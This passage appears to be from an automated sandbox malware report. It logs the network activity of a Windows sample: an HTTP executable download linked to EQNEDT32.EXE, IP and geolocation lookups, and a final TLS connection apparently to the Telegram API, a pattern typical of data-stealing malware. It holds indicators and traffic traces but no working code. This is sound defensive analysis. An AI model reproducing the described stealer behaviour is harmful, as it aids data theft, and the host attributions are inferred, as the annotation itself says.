Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_00695F28
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_00695F38
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_00692B00
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_00692E16
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_00692AF2
Source: global traffic DNS query: name: checkip.dyndns.org (17 queries)
Source: global traffic DNS query: name: reallyfreegeoip.org (8 queries)
Source: global traffic DNS query: name: api.telegram.org (1 query)
Source: global traffic TCP traffic: 192.168.2.22:49163 <-> 87.120.84.38:80 (63 segments: 26 client-to-server, 37 server-to-client; the only flow in the listing with server-to-client segments, which fits the EQNEDT32.EXE connection to 87.120.84.38:80 and the executable download over HTTP recorded above)
Source: global traffic TCP traffic: 192.168.2.22:49164, 49167, 49171, 49177 -> 193.122.6.168:80 (client-to-server segments only)
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 158.101.44.242:80 (client-to-server segments only)
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 132.226.247.73:80 (client-to-server segments only)
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 193.122.130.0:80 (client-to-server segments only)
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 132.226.8.169:80 (client-to-server segments only)
Source: global traffic TCP traffic: 192.168.2.22:49165, 49166, 49176, 49178 -> 188.114.96.3:443 (client-to-server segments only)
Source: global traffic TCP traffic: 192.168.2.22:49168, 49170, 49172, 49174, 49180 -> 188.114.97.3:443 (client-to-server segments only)
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443 (client-to-server segments only)
Note on the flows: the port-80 connections to the 193.122.x, 158.101.x and 132.226.x hosts and the port-443 connections to 188.114.96.3 / 188.114.97.3 are interleaved in source-port order, as the checkip.dyndns.org and reallyfreegeoip.org queries are, so they are most plausibly the external-IP and geolocation lookups; 188.114.96.3 / 188.114.97.3 are Cloudflare addresses (consistent with reallyfreegeoip.org), and 149.154.167.220 lies in Telegram's address range (consistent with api.telegram.org, the last DNS query, and with the 49181 connection being the last TLS session). These host-to-IP attributions are inferred from the ordering, not reported by the sandbox.
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
